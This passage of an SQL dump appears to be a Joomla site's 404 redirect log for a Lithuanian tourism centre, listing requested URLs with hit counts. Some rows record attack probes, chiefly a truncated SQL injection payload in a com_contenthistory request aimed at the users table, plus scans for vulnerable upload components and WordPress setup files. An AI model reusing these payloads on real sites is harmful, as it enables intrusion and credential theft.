00:00:00'),(1625,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',16,0,'2016-06-23 00:59:45','0000-00-00 00:00:00'),(1626,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/51-vienuolynas/vienuolynas','','','',36,0,'2016-06-23 01:00:05','0000-00-00 00:00:00'),(1627,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/43-apie-centra/general','','','',38,0,'2016-06-23 01:00:17','0000-00-00 00:00:00'),(1628,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veikla/veiklos_strategija.pdf','','','',15,0,'2016-06-23 01:52:07','0000-00-00 00:00:00'),(1629,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_strategija.pdf','','','',14,0,'2016-06-23 01:53:11','0000-00-00 00:00:00'),(1630,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/istatai.pdf','','','',15,0,'2016-06-23 01:55:21','0000-00-00 00:00:00'),(1631,'http://www.infotytuvenai.lt/index.php/lt/component/undefined/','','','',1,0,'2016-06-23 01:55:32','0000-00-00 00:00:00'),(1632,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/fr0512.pdf','','','',1,0,'2016-06-23 01:55:32','0000-00-00 00:00:00'),(1633,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/skaidres.pdf','','','',1,0,'2016-06-23 01:56:27','0000-00-00 00:00:00'),(1634,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',5,0,'2016-06-23 01:57:15','0000-00-00 00:00:00'),(1635,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',4,0,'2016-06-23 01:57:59','0000-00-00 00:00:00'),(1636,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',5,0,'2016-06-23 01:59:03','0000-00-00 00:00:00'),(1637,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',6,0,'2016-06-23 01:59:50','0000-00-00 00:00:00'),(1638,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',29,0,'2016-06-25 06:52:59','0000-00-00 00:00:00'),(1639,'http://infotytuvenai.lt/index.php/lt/component/undefined/','','','',8,0,'2016-06-26 04:35:38','0000-00-00 00:00:00'),(1640,'http://infotytuvenai.lt/index.php/lt/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',11,0,'2016-06-26 04:35:59','0000-00-00 00:00:00'),(1641,'http://infotytuvenai.lt/index.php/lt/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',9,0,'2016-06-26 04:36:31','0000-00-00 00:00:00'),(1642,'http://infotytuvenai.lt/index.php/lt/component/content/category/46-tytuvenai/apie-tytuvenus','','','',47,0,'2016-06-26 04:36:42','0000-00-00 00:00:00'),(1643,'http://infotytuvenai.lt/index.php/lt/component/content/category/19-sample-data-article/demo/courses','','','',10,0,'2016-06-26 04:37:03','0000-00-00 00:00:00'),(1644,'http://infotytuvenai.lt/index.php/lt/component/content/category/10-sample-data-article/demo','','','',27,0,'2016-06-26 04:37:25','0000-00-00 00:00:00'),(1645,'http://infotytuvenai.lt/index.php/lt/component/content/category/13-sample-data-article/demo/features','','','',9,0,'2016-06-26 04:37:46','0000-00-00 00:00:00'),(1646,'http://infotytuvenai.lt/index.php/lt/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',11,0,'2016-06-26 04:38:08','0000-00-00 00:00:00'),(1647,'http://infotytuvenai.lt/index.php/lt/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',11,0,'2016-06-26 04:38:19','0000-00-00 00:00:00'),(1648,'http://infotytuvenai.lt/index.php/lt/component/content/category/56-tytuvenu-festivalis/naujienos','','','',55,0,'2016-06-26 04:38:29','0000-00-00 00:00:00'),(1649,'http://infotytuvenai.lt/index.php/lt/component/content/category/11-sample-data-article/demo/short-code','','','',11,0,'2016-06-26 04:39:12','0000-00-00 00:00:00'),(1650,'http://infotytuvenai.lt/index.php/lt/component/content/category/41-apie-centra/projektai','','','',69,0,'2016-06-26 04:39:34','0000-00-00 00:00:00'),(1651,'http://infotytuvenai.lt/index.php/lt/component/content/category/8-sample-data-article/joomla','','','',42,0,'2016-06-26 04:39:45','0000-00-00 00:00:00'),(1652,'http://infotytuvenai.lt/index.php/lt/component/content/category/43-apie-centra/general','','','',72,0,'2016-06-26 04:39:56','0000-00-00 00:00:00'),(1653,'http://infotytuvenai.lt/index.php/lt/component/content/category/51-vienuolynas/vienuolynas','','','',67,0,'2016-06-26 04:40:07','0000-00-00 00:00:00'),(1654,'http://infotytuvenai.lt/index.php/lt/component/content/category/47-piligrimai/piligrimai','','','',68,0,'2016-06-26 04:40:19','0000-00-00 00:00:00'),(1655,'http://infotytuvenai.lt/index.php/lt/component/content/category/14-sample-data-article/demo/portfolio','','','',10,0,'2016-06-26 04:40:32','0000-00-00 00:00:00'),(1656,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_strategija.pdf','','','',12,0,'2016-06-26 04:46:11','0000-00-00 00:00:00'),(1657,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veikla/veiklos_strategija.pdf','','','',10,0,'2016-06-26 04:47:18','0000-00-00 00:00:00'),(1658,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',14,0,'2016-06-26 04:48:12','0000-00-00 00:00:00'),(1659,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',12,0,'2016-06-26 04:48:34','0000-00-00 00:00:00'),(1660,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',13,0,'2016-06-26 04:48:57','0000-00-00 00:00:00'),(1661,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',13,0,'2016-06-26 04:49:19','0000-00-00 00:00:00'),(1662,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/istatai.pdf','','','',12,0,'2016-06-26 04:49:42','0000-00-00 00:00:00'),(1663,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/skaidres.pdf','','','',5,0,'2016-06-26 04:50:06','0000-00-00 00:00:00'),(1664,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/fr0512.pdf','','','',6,0,'2016-06-26 07:52:19','0000-00-00 00:00:00'),(1665,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/\"index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo\"','','','',2,0,'2016-06-28 05:21:42','0000-00-00 00:00:00'),(1666,'http://infotytuvenai.lt/index.php/lt/component/content/category/index.php/apie-centra/ekskursijos','','','',12,0,'2016-06-29 02:02:51','0000-00-00 00:00:00'),(1667,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',50,0,'2016-06-29 02:08:16','0000-00-00 00:00:00'),(1668,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/index.php/apie-centra/ekskursijos','','','',12,0,'2016-07-02 13:37:01','0000-00-00 00:00:00'),(1669,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',5,0,'2016-07-03 13:39:49','0000-00-00 00:00:00'),(1670,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/gamtos-paminklai','','','',50,0,'2016-07-05 06:04:52','0000-00-00 00:00:00'),(1671,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_n.png','','','',3,0,'2016-07-08 08:13:51','0000-00-00 00:00:00'),(1672,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_ne.png','','','',3,0,'2016-07-08 08:13:52','0000-00-00 00:00:00'),(1673,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_e.png','','','',3,0,'2016-07-08 08:13:52','0000-00-00 00:00:00'),(1674,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_se.png','','','',3,0,'2016-07-08 08:13:53','0000-00-00 00:00:00'),(1675,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_s.png','','','',3,0,'2016-07-08 08:13:53','0000-00-00 00:00:00'),(1676,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_sw.png','','','',3,0,'2016-07-08 08:13:54','0000-00-00 00:00:00'),(1677,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_w.png','','','',3,0,'2016-07-08 08:13:54','0000-00-00 00:00:00'),(1678,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/fancybox/fancy_shadow_nw.png','','','',3,0,'2016-07-08 08:13:54','0000-00-00 00:00:00'),(1679,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_n.png','','','',1,0,'2016-07-08 08:15:24','0000-00-00 00:00:00'),(1680,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_ne.png','','','',1,0,'2016-07-08 08:15:25','0000-00-00 00:00:00'),(1681,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_e.png','','','',1,0,'2016-07-08 08:15:25','0000-00-00 00:00:00'),(1682,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_se.png','','','',1,0,'2016-07-08 08:15:25','0000-00-00 00:00:00'),(1683,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_s.png','','','',1,0,'2016-07-08 08:15:26','0000-00-00 00:00:00'),(1684,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_sw.png','','','',1,0,'2016-07-08 08:15:26','0000-00-00 00:00:00'),(1685,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_w.png','','','',1,0,'2016-07-08 08:15:27','0000-00-00 00:00:00'),(1686,'http://www.infotytuvenai.lt/index.php/lt/fancybox/fancy_shadow_nw.png','','','',1,0,'2016-07-08 08:15:27','0000-00-00 00:00:00'),(1687,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',22,0,'2016-07-08 10:44:35','0000-00-00 00:00:00'),(1688,'http://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',42,0,'2016-07-13 19:04:41','0000-00-00 00:00:00'),(1689,'http://infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',2,0,'2016-07-18 16:57:14','0000-00-00 00:00:00'),(1690,'http://infotytuvenai.lt/?option=com_tags','','http://infotytuvenai.lt/?option=com_tags','',2,0,'2016-07-19 20:21:48','0000-00-00 00:00:00'),(1691,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',50,0,'2016-07-22 11:12:12','0000-00-00 00:00:00'),(1692,'http://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=register','','http://www.infotytuvenai.lt/index.php?option=com_user&view=register','',235,0,'2016-08-18 04:54:15','0000-00-00 00:00:00'),(1693,'http://www.infotytuvenai.lt/index.php/lt/component/user?task=register','','http://www.infotytuvenai.lt/index.php/component/user/?task=register','',236,0,'2016-08-18 04:54:16','0000-00-00 00:00:00'),(1694,'http://infotytuvenai.lt/index.php/lt/?option=com_easyblog&view=dashboard&layout=write','','http://infotytuvenai.lt/index.php?option=com_easyblog&view=dashboard&layout=write','',76,0,'2016-08-22 07:06:28','0000-00-00 00:00:00'),(1695,'http://infotytuvenai.lt/index.php/lt/?option=com_user&view=register','','http://infotytuvenai.lt/index.php?option=com_user&view=register','',458,0,'2016-08-22 07:06:32','0000-00-00 00:00:00'),(1696,'http://infotytuvenai.lt/index.php/lt/component/user?task=register','','http://infotytuvenai.lt/index.php/component/user/?task=register','',403,0,'2016-08-22 07:06:33','0000-00-00 00:00:00'),(1697,'http://infotytuvenai.lt/index.php/lt/?option=com_jdownloads&Itemid=0&view=upload','','','',53,0,'2016-08-30 16:41:04','0000-00-00 00:00:00'),(1698,'http://infotytuvenai.lt/index.php/lt/?option=com_myblog&task=ajaxupload','','','',1242,0,'2016-09-01 00:24:46','0000-00-00 00:00:00'),(1699,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/\"index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo\"','','','',1,0,'2016-09-02 06:20:23','0000-00-00 00:00:00'),(1700,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1','','','',4,0,'2016-09-11 20:23:23','0000-00-00 00:00:00'),(1701,'http://www.infotytuvenai.lt/index.php/lt/?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from #__users limit 0,1),floor(rand(0)*2))x from inf','','','',1,0,'2016-09-13 19:28:20','0000-00-00 00:00:00'),(1702,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',59,0,'2016-09-25 05:38:48','0000-00-00 00:00:00'),(1703,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/','','','',27,0,'2016-10-06 18:01:19','0000-00-00 00:00:00'),(1704,'http://infotytuvenai.lt/index.php/lt/?option=com_attachments&task=upload','','','',1,0,'2016-10-26 21:10:40','0000-00-00 00:00:00'),(1705,'http://infotytuvenai.lt/index.php/lt/?option=com_adsmanager&task=upload&tmpl=component','','','',161,0,'2016-10-27 13:06:36','0000-00-00 00:00:00'),(1706,'http://infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',1,0,'2016-10-27 16:59:21','0000-00-00 00:00:00'),(1707,'http://infotytuvenai.lt/index.php/lt/author-login','','','',12,0,'2016-10-28 01:57:49','0000-00-00 00:00:00'),(1708,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/item','','','',16,0,'2016-11-07 11:31:03','0000-00-00 00:00:00'),(1709,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/category','','','',16,0,'2016-11-07 11:49:49','0000-00-00 00:00:00'),(1710,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag','','','',16,0,'2016-11-07 11:50:01','0000-00-00 00:00:00'),(1711,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis','','','',16,0,'2016-11-07 11:55:41','0000-00-00 00:00:00'),(1712,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag','','','',16,0,'2016-11-07 11:57:53','0000-00-00 00:00:00'),(1713,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item','','','',15,0,'2016-11-07 11:58:30','0000-00-00 00:00:00'),(1714,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis','','','',16,0,'2016-11-07 12:02:48','0000-00-00 00:00:00'),(1715,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/category','','','',16,0,'2016-11-07 12:05:41','0000-00-00 00:00:00'),(1716,'http://infotytuvenai.lt/index.php/lt/administrator/','','http://infotytuvenai.lt/index.php/lt/administrator/','',1,0,'2016-11-17 23:01:41','0000-00-00 00:00:00'),(1717,'http://infotytuvenai.lt/index.php/lt/forum/topic/create','','http://infotytuvenai.lt/index.php/forum/topic/create','',3,0,'2016-11-29 08:05:39','0000-00-00 00:00:00'),(1718,'http://infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',3,0,'2016-12-04 20:34:57','0000-00-00 00:00:00'),(1719,'http://infotytuvenai.lt///index.php?option=com_adsmanager&task=upload&tmpl=component','','','',6,0,'2016-12-10 05:26:09','0000-00-00 00:00:00'),(1720,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',30,0,'2016-12-10 05:26:11','0000-00-00 00:00:00'),(1721,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_myblog&task=ajaxupload','','','',102,0,'2016-12-10 05:26:13','0000-00-00 00:00:00'),(1722,'http://www.infotytuvenai.lt//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',50,0,'2016-12-11 05:56:12','0000-00-00 00:00:00'),(1723,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',10,0,'2016-12-11 05:56:13','0000-00-00 00:00:00'),(1724,'http://www.infotytuvenai.lt/index.php/lt/?option=com_myblog&task=ajaxupload','','','',46,0,'2016-12-11 05:56:14','0000-00-00 00:00:00'),(1725,'http://www.infotytuvenai.lt/index.php/lt/kontaktaigo','','','',1,0,'2016-12-22 11:50:02','0000-00-00 00:00:00'),(1726,'http://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','','http://infotytuvenai.lt/index.php/lt/','',101,0,'2017-01-03 09:14:01','0000-00-00 00:00:00'),(1727,'http://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','http://infotytuvenai.lt/index.php/lt/','',105,0,'2017-01-03 09:15:15','0000-00-00 00:00:00'),(1728,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','','',133,0,'2017-01-04 04:22:43','0000-00-00 00:00:00'),(1729,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','','','',125,0,'2017-01-05 13:23:47','0000-00-00 00:00:00'),(1730,'http://www.infotytuvenai.lt/index.php/lt/struktura-ir-kontaktai/kontaktai','','','',2,0,'2017-01-17 12:46:34','0000-00-00 00:00:00'),(1731,'http://www.infotytuvenai.lt/index.php/lt/kontaktai.html','','','',4,0,'2017-01-17 12:46:41','0000-00-00 00:00:00'),(1732,'http://www.infotytuvenai.lt/index.php/en/contacts','','','',2,0,'2017-01-17 12:46:46','0000-00-00 00:00:00'),(1733,'http://www.infotytuvenai.lt/index.php/lt/customers/shops_addresses/1029','','','',2,0,'2017-01-17 12:46:57','0000-00-00 00:00:00'),(1734,'http://www.infotytuvenai.lt/index.php/lt/36932/','','','',1,0,'2017-01-17 12:47:06','0000-00-00 00:00:00'),(1735,'http://www.infotytuvenai.lt/index.php/lt/component/jumi/k2-google-map/vaistiniu-zemelapis','','','',2,0,'2017-01-17 12:47:08','0000-00-00 00:00:00'),(1736,'http://www.infotytuvenai.lt/index.php/lt/k2-google-map/vaistiniu-zemelapis','','','',2,0,'2017-01-17 12:47:15','0000-00-00 00:00:00'),(1737,'http://www.infotytuvenai.lt/index.php/lt/bendruomene/mokytojai','','','',2,0,'2017-01-17 12:47:17','0000-00-00 00:00:00'),(1738,'http://www.infotytuvenai.lt/index.php/lt/17-sample-data-article/demo/portfolio/2012','','','',15,0,'2017-02-24 06:28:38','0000-00-00 00:00:00'),(1739,'http://www.infotytuvenai.lt/index.php/lt/18-sample-data-article/demo/portfolio/2013','','','',15,0,'2017-02-24 06:28:39','0000-00-00 00:00:00'),(1740,'http://www.infotytuvenai.lt/index.php/lt/16-sample-data-article/demo/portfolio/2011','','','',15,0,'2017-02-24 06:28:49','0000-00-00 00:00:00'),(1741,'http://www.infotytuvenai.lt/index.php/lt/15-sample-data-article/demo/portfolio/2010','','','',15,0,'2017-02-24 06:28:50','0000-00-00 00:00:00'),(1742,'http://infotytuvenai.lt/index.php/lt/images/stories/projektai/bpd.png','','','',4,0,'2017-02-28 10:10:30','0000-00-00 00:00:00'),(1743,'http://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/bpd.png','','','',6,0,'2017-03-06 03:36:36','0000-00-00 00:00:00'),(1744,'http://infotytuvenai.lt/index.php/lt/index.php/lt/','','http://infotytuvenai.lt/index.php/lt/','',749,0,'2017-03-06 04:16:12','0000-00-00 00:00:00'),(1745,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',12,0,'2017-03-07 15:11:51','0000-00-00 00:00:00'),(1747,'http://www.infotytuvenai.lt///index.php?option=com_adsmanager&task=upload&tmpl=component','','','',11,0,'2017-03-20 07:57:41','0000-00-00 00:00:00'),(1748,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',12,0,'2017-03-20 07:57:42','0000-00-00 00:00:00'),(1749,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_myblog&task=ajaxupload','','','',32,0,'2017-03-20 07:57:47','0000-00-00 00:00:00'),(1750,'http://www.infotytuvenai.lt//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',17,0,'2017-03-20 07:57:47','0000-00-00 00:00:00'),(1751,'http://infotytuvenai.lt/index.php/lt/pasiulymai/wp/wp-admin/setup-config.php','','','',1,0,'2017-03-24 14:44:01','0000-00-00 00:00:00'),(1752,'http://infotytuvenai.lt/index.php/lt/pasiulymai/blog/wp-admin/setup-config.php','','','',1,0,'2017-03-24 14:44:01','0000-00-00 00:00:00'),(1753,'http://infotytuvenai.lt/index.php/lt/pasiulymai/old/wp-admin/setup-config.php','','','',1,0,'2017-03-24 14:44:02','0000-00-00 00:00:00'),(1754,'http://infotytuvenai.lt/index.php/lt/pasiulymai/wordpress/wp-admin/setup-config.php','','','',1,0,'2017-03-24 14:44:02','0000-00-00 00:00:00'),(1755,'http://infotytuvenai.lt/index.php/lt/pasiulymai/test/wp-admin/setup-config.php','','','',1,0,'2017-03-24 14:44:03','0000-00-00 00:00:00'),(1756,'http://infotytuvenai.lt/index.php/lt/?option=com_user&view=login','','','',2,0,'2017-03-28 08:28:50','0000-00-00 00:00:00'),(1757,'http://www.infotytuvenai.lt/index.php/lt/?option=com_easyblog&view=dashboard&layout=write','','http://www.infotytuvenai.lt/index.php?option=com_easyblog&view=dashboard&layout=write','',32,0,'2017-04-01 04:20:00','0000-00-00 00:00:00'),(1758,'http://infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',51,0,'2017-04-03 10:38:17','0000-00-00 00:00:00'),(1759,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',60,0,'2017-04-03 10:38:18','0000-00-00 00:00:00'),(1760,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_user&view=register','','','',2,0,'2017-04-08 23:50:08','0000-00-00 00:00:00'),(1761,'http://infotytuvenai.lt/index.php/lt/?option=com_user&task=register','','','',58,0,'2017-04-09 23:40:44','0000-00-00 00:00:00'),(1762,'http://www.infotytuvenai.lt/index.php/lt/apie-centra; info@infotytuvenai.lt','','','',88,0,'2017-04-25 17:44:41','0000-00-00 00:00:00'),(1763,'http://infotytuvenai.lt//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',118,0,'2017-04-27 23:32:29','0000-00-00 00:00:00'),(1764,'http://infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',65,0,'2017-04-27 23:32:31','0000-00-00 00:00:00'),(1765,'http://infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',150,0,'2017-04-27 23:32:56','0000-00-00 00:00:00'),(1766,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/kontaktai','','http://www.infotytuvenai.lt//index.php/lt/kontaktai','',34,0,'2017-04-29 10:03:20','0000-00-00 00:00:00'),(1767,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis/kontaktai','','http://www.infotytuvenai.lt//index.php/lt/tytuvenu-festivalis/kontaktai','',9,0,'2017-04-29 10:03:21','0000-00-00 00:00:00'),(1768,'http://infotytuvenai.lt/index.php/lt/15-sample-data-article/demo/portfolio/2010','','','',13,0,'2017-05-01 09:25:53','0000-00-00 00:00:00'),(1769,'http://infotytuvenai.lt/index.php/lt/16-sample-data-article/demo/portfolio/2011','','','',13,0,'2017-05-01 09:26:06','0000-00-00 00:00:00'),(1770,'http://infotytuvenai.lt/index.php/lt/17-sample-data-article/demo/portfolio/2012','','','',13,0,'2017-05-01 09:26:11','0000-00-00 00:00:00'),(1771,'http://infotytuvenai.lt/index.php/lt/18-sample-data-article/demo/portfolio/2013','','','',13,0,'2017-05-01 09:26:13','0000-00-00 00:00:00'),(1772,'http://www.infotytuvenai.lt/index.php/lt/turizmo-info','','','',1,0,'2017-05-06 02:15:56','0000-00-00 00:00:00'),(1773,'http://infotytuvenai.lt/index.php/lt/turizmo-informaci','','','',1,0,'2017-05-06 02:19:55','0000-00-00 00:00:00'),(1774,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrut','','','',1,0,'2017-05-06 06:45:48','0000-00-00 00:00:00'),(1775,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/n','','','',1,0,'2017-05-06 06:49:34','0000-00-00 00:00:00'),(1776,'http://www.infotytuvenai.lt/index.php/lt/lank','','','',1,0,'2017-05-06 06:53:23','0000-00-00 00:00:00'),(1777,'http://www.infotytuvenai.lt/index.php/lt/turi','','','',1,0,'2017-05-06 06:53:44','0000-00-00 00:00:00'),(1778,'http://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios','','','',1,0,'2017-05-06 06:53:44','0000-00-00 00:00:00'),(1779,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra','','','',30,0,'2017-05-15 19:25:52','0000-00-00 00:00:00'),(1780,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/paslaugos','','','',30,0,'2017-05-15 19:25:55','0000-00-00 00:00:00'),(1781,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/ekskursijos','','','',30,0,'2017-05-15 19:25:57','0000-00-00 00:00:00'),(1782,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/edukacines-programos','','','',30,0,'2017-05-15 19:25:59','0000-00-00 00:00:00'),(1783,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/suvenyrai','','','',12,0,'2017-05-15 19:26:01','0000-00-00 00:00:00'),(1784,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/istatai','','','',28,0,'2017-05-15 19:26:04','0000-00-00 00:00:00'),(1785,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/darbo-uzmokestis','','','',28,0,'2017-05-15 19:26:06','0000-00-00 00:00:00'),(1786,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-strategija','','','',28,0,'2017-05-15 19:26:08','0000-00-00 00:00:00'),(1787,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/viesieji-pirkimai','','','',9,0,'2017-05-15 19:26:11','0000-00-00 00:00:00'),(1788,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','','',9,0,'2017-05-15 19:26:13','0000-00-00 00:00:00'),(1789,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/parama','','','',28,0,'2017-05-15 19:26:15','0000-00-00 00:00:00'),(1790,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/galerija','','','',23,0,'2017-05-15 19:26:18','0000-00-00 00:00:00'),(1791,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-ataskaitos','','','',28,0,'2017-05-15 19:26:20','0000-00-00 00:00:00'),(1792,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/pasiulymai','','','',28,0,'2017-05-15 19:26:22','0000-00-00 00:00:00'),(1793,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija','','','',28,0,'2017-05-15 19:26:25','0000-00-00 00:00:00'),(1794,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/aktyvus-poilsis','','','',28,0,'2017-05-15 19:26:27','0000-00-00 